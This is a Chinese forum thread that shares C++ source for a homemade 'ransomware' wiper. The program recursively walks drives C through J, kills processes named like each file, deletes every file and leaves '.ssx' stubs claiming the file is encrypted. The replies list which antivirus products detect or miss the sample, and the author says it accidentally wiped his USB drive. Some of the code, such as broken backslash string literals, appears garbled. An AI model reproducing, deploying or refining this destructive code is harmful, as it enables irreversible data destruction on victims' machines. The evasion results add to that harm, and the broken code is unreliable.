自制勒索（其实只是删了文件就不管了）

idgg007

代码：

1. #include <Windows.h>
   
2. #include <sstream>
   
3. #include <fstream>
   
4. #include <string>
   
5. #include <cstdio>
   
6. #include <vector>
   
7. #include <stdio.h>
   
8. #include <windows.h>
   
9. #include <tlhelp32.h>
   
10. #include <tchar.h>
    
11. //typedef struct _WIN32_FIND_DATA {
    
12. //    DWORD dwFileAttributes; //文件属性
    
13. //    FILETIME ftCreationTime; // 文件创建时间
    
14. //    FILETIME ftLastAccessTime; // 文件最后一次访问时间
    
15. //    FILETIME ftLastWriteTime; // 文件最后一次修改时间
    
16. //    DWORD nFileSizeHigh; // 文件长度高32位
    
17. //    DWORD nFileSizeLow; // 文件长度低32位
    
18. //    DWORD dwReserved0; // 系统保留
    
19. //    DWORD dwReserved1; // 系统保留
    
20. //    TCHAR cFileName[ MAX_PATH ]; // 长文件名
    
21. //    TCHAR cAlternateFileName[ 14 ]; // 8.3格式文件名
    
22. //  } WIN32_FIND_DATA, *PWIN32_FIND_DATA;
    
23. //递归遍历指定文件夹下的所有文件夹和文件
    
24. int GetProcessCount(const TCHAR* szExeName) {
    
25.         TCHAR sztarget[MAX_PATH];
    
26.         lstrcpy(sztarget, szExeName);
    
27.         CharLowerBuff(sztarget, MAX_PATH);
    
28.         int count = 0;
    
29.         PROCESSENTRY32 my;
    
30.         HANDLE l = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    
31.         if (((int)l) != -1) {
    
32.                 my.dwSize = sizeof(my);
    
33.                 if (Process32First(l, &my)) {
    
34.                         do {
    
35.                                 CharLowerBuff(my.szExeFile, MAX_PATH);
    
36.                                 if (lstrcmp(sztarget, my.szExeFile) == 0) {
    
37.                                         count++;
    
38.                                 }
    
39.                         } while (Process32Next(l, &my));
    
40.                 }
    
41.                 CloseHandle(l);
    
42.         }
    
43.         return count;
    
44. }
    
45. DWORD GetProcessIdFromName(char *name) {
    
46.         HANDLE  hsnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    
47.         if (hsnapshot == INVALID_HANDLE_VALUE) {
    
48.                 printf("CreateToolhelp32Snapshot Error!\n");
    
49.                 return 0;
    
50.         }
    
51. 
    
52.         PROCESSENTRY32 pe;
    
53.         pe.dwSize = sizeof(PROCESSENTRY32);
    
54. 
    
55.         int flag = Process32First(hsnapshot, &pe);
    
56. 
    
57.         while (flag != 0) {
    
58.                 if (strcmp(pe.szExeFile, name) == 0) {
    
59.                         return pe.th32ProcessID;
    
60.                 }
    
61.                 flag = Process32Next(hsnapshot, &pe);
    
62.         }
    
63. 
    
64.         CloseHandle(hsnapshot);
    
65. 
    
66.         return 0;
    
67. }
    
68. bool        KillProcess(DWORD pid) {
    
69.         HANDLE        hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, pid);
    
70.         if (!hProcess) {
    
71.                 return false;
    
72.         }
    
73.         BOOL success = TerminateProcess(hProcess, 1);
    
74.         CloseHandle(hProcess);
    
75.         return success != FALSE;
    
76. }
    
77. void Start(char name[]){
    
78.         char Isrun[100];
    
79.         int l=0;
    
80.         for(int i=0;name[i];i++){
    
81.                 if(name[i]=='\\'){
    
82.                         l=i;
    
83.                 }
    
84.         }
    
85.         for(int i=l+1,j=0;name[i];i++){
    
86.                 Isrun[j]=name[i];
    
87.         }
    
88.         if(!strcmp(Isrun,"勒索.exe")){//判断是否遍历到了自己
    
89.                 return;
    
90.         }
    
91.         if(GetProcessCount(Isrun)){
    
92.                 KillProcess(GetProcessIdFromName(Isrun));
    
93.         }
    
94.         remove(name);
    
95.         strcat(name,".ssx");
    
96.         std::ofstream out(name);
    
97.         out<<"本文已经被加密";
    
98. }
    
99. void DirectorySearch(const char *dirPath) {
    
100. 
     
101.         WIN32_FIND_DATAA lpFindFileData;//这是windows定义的结构体。参见上面
     
102.         //路径临时缓存，如果传进来的路径参数dirPath包含最后一个'\'，则不做操作，否则加上'\'
     
103.         char dirPathTemp[MAX_PATH];
     
104.         //路径搜索通配符参数，在总路径后面加上*，匹配所有文件和文件夹
     
105.         char dirCodeTemp[MAX_PATH];
     
106.         strcpy(dirPathTemp, dirPath);
     
107.         strcpy(dirCodeTemp, dirPath);
     
108.         const char *pChar = strrchr(dirPath, '\\');
     
109.         //如果\\在末尾存在
     
110.         if (pChar != NULL && strlen(pChar) == 1) {
     
111.                 strcat(dirCodeTemp, "*");
     
112.         } else {
     
113.                 strcat(dirCodeTemp, "\\*");
     
114.                 strcat(dirPathTemp, "\");
     
115.         }
     
116.         //根据dirCodeTemp通配符查找路径
     
117.         HANDLE handle = FindFirstFileA(dirCodeTemp, &lpFindFileData);
     
118.         if (handle == INVALID_HANDLE_VALUE) {
     
119.                 //cout<<dirPathTemp<<"检索失败!"<<endl;
     
120.                 return;
     
121.         }
     
122.         //如果输的的是文件，则打印名字和大小
     
123.         if ((lpFindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) == 0) {
     
124.                 //cout<<"文件名："<<dirPathTemp<<"  大小："<< lpFindFileData.nFileSizeHigh * (MAXDWORD+1) + lpFindFileData.nFileSizeLow<<endl;
     
125.                 Start(dirPathTemp);
     
126.         }
     
127.         //如果输的的是文件夹，则打印名字
     
128.         else {
     
129.                 //cout<<"文件夹名："<<dirPathTemp<<endl;
     
130.         }
     
131.         //遍历本路径下的文件夹和文件
     
132.         while (FindNextFileA(handle, &lpFindFileData)) {
     
133.                 //如果是当前根路径，则无需检查(因为上面已经打印了)
     
134.                 if (!strcmp(lpFindFileData.cFileName, ".") || !strcmp(lpFindFileData.cFileName, ".."))
     
135.                         continue;
     
136.                 //当前文件夹或文件的全路径(当前根路径 + 文件夹或文件的名称)
     
137.                 char dirFileTemp[MAX_PATH];
     
138.                 strcpy(dirFileTemp, dirPathTemp);
     
139.                 strcat(dirFileTemp, lpFindFileData.cFileName);
     
140.                 if ((lpFindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) == 0) {
     
141.                         //cout<<"文件名："<<dirFileTemp<<"  大小："<< lpFindFileData.nFileSizeHigh * (MAXDWORD+1) + lpFindFileData.nFileSizeLow<<endl;
     
142.                         Start(dirFileTemp);
     
143.                 } else {
     
144.                         //cout<<"文件夹名："<<dirFileTemp<<endl;
     
145.                         strcat(dirFileTemp, "\");
     
146.                         //递归检查此子文件夹
     
147.                         DirectorySearch(dirFileTemp);
     
148.                 }
     
149.         }
     
150.         //关闭文件搜索句柄
     
151.         FindClose(handle);
     
152. }
     
153. int FILE_GPS(char Str[]) {
     
154.         DirectorySearch(Str);
     
155.         return 0;
     
156. }
     
157. int main(){
     
158.         FILE_GPS("D:\");
     
159.         FILE_GPS("E:\");
     
160.         FILE_GPS("F:\");
     
161.         FILE_GPS("I:\");
     
162.         FILE_GPS("J:\");
     
163.         FILE_GPS("B:\");
     
164.         FILE_GPS("G:\");
     
165.         FILE_GPS("H:\");
     
166.         FILE_GPS("C:\");
     
167.         return 0;
     
168. }

复制代码

C++代码

idgg007

761773275

HitmanPro.Alert 被过


EMSI杀

idgg007

换了一个GCC，现在能传了

idgg007

761773275 发表于 2021-5-29 19:13
没样本你说啥？

发了

hyx2230

火绒、智量扫描miss

正在缓冲

微软够神奇VirusTotal

心心相印

eis miss

idgg007

最惨的是我在学校机房改代码的时候插着U盘，就运行了，U盘遭殃

anthonyqian

诺顿双击DP拦截。